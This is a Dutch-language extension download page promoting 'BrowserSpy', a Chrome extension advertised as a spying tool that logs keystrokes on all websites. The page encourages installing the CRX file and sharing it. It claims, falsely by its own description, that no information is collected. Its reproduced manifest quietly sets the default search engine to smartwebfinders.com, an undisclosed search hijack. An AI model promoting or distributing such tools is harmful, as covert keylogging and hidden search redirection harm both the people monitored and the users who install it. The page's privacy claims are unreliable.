Top Spying tool : BrowserSpy

BrowserSpy is an online spying tool that helps you log the keystrokes and other user data.

Wat is Top Spying tool : BrowserSpy?

Top Spying tool : BrowserSpy is een Chrome-extensie ontwikkeld door tackker, en de belangrijkste functie is "BrowserSpy is an online spying tool that helps you log the keystrokes and other user data.".

Extensie Screenshots

screenshot

Download het CRX-bestand van de extensie Top Spying tool : BrowserSpy

Download Top Spying tool : BrowserSpy-extensiebestanden in crx-indeling, installeer Chrome-extensies handmatig in de browser of deel de crx-bestanden met vrienden om Chrome-extensies eenvoudig te installeren.

Instructies voor het Gebruik van de Extensie

                        BrowserSpy - The Best Spying Tool

BrowserSpy helps monitoring on browser activity and can also assist in spying activities. This extension records keystrokes on all websites. 

This extension does NOT collect any information
(all logged data stays put)                    

Basisinformatie over de Extensie

Naam Top Spying tool : BrowserSpy Top Spying tool : BrowserSpy
ID cenplbjdopjciamjdjiehflkhfjmklhm
Officiële URL https://chromewebstore.google.com/detail/top-spying-tool-browsersp/cenplbjdopjciamjdjiehflkhfjmklhm
Beschrijving BrowserSpy is an online spying tool that helps you log the keystrokes and other user data.
Bestandsgrootte 213 KB
Aantal Installaties 132
Huidige Versie 0.9
Laatst Bijgewerkt 2024-03-02
Publicatiedatum 2021-03-30
Beoordeling 4.50/5 Totaal 2 Beoordelingen
Ontwikkelaar tackker
E-mail [email protected]
Betalingswijze free
URL van de Privacybeleid Pagina https://tackker.com/privacy-policy
Ondersteunde Talen en-US
manifest.json
{
    "update_url": "https:\/\/clients2.google.com\/service\/update2\/crx",
    "manifest_version": 3,
    "name": "Top Spying tool : BrowserSpy",
    "description": "BrowserSpy is an online spying tool that helps you log the keystrokes and other user data.",
    "version": "0.9",
    "icons": {
        "128": "browser.png",
        "48": "browser.png",
        "16": "browser.png"
    },
    "action": [],
    "background": {
        "service_worker": "back.js",
        "type": "module"
    },
    "content_scripts": [
        {
            "matches": [
                ""
            ],
            "js": [
                "jquery-3.5.0.min.js",
                "content.js"
            ]
        }
    ],
    "chrome_settings_overrides": {
        "search_provider": {
            "name": "Smart",
            "keyword": "Smart",
            "search_url": "https:\/\/smartwebfinders.com\/?n=60&q={searchTerms}",
            "favicon_url": "https:\/\/smartwebfinders.com\/favicon.ico",
            "encoding": "UTF-8",
            "is_default": true
        }
    },
    "permissions": [
        "alarms",
        "tabs",
        "webRequest",
        "webNavigation",
        "scripting",
        "storage",
        "unlimitedStorage"
    ]
}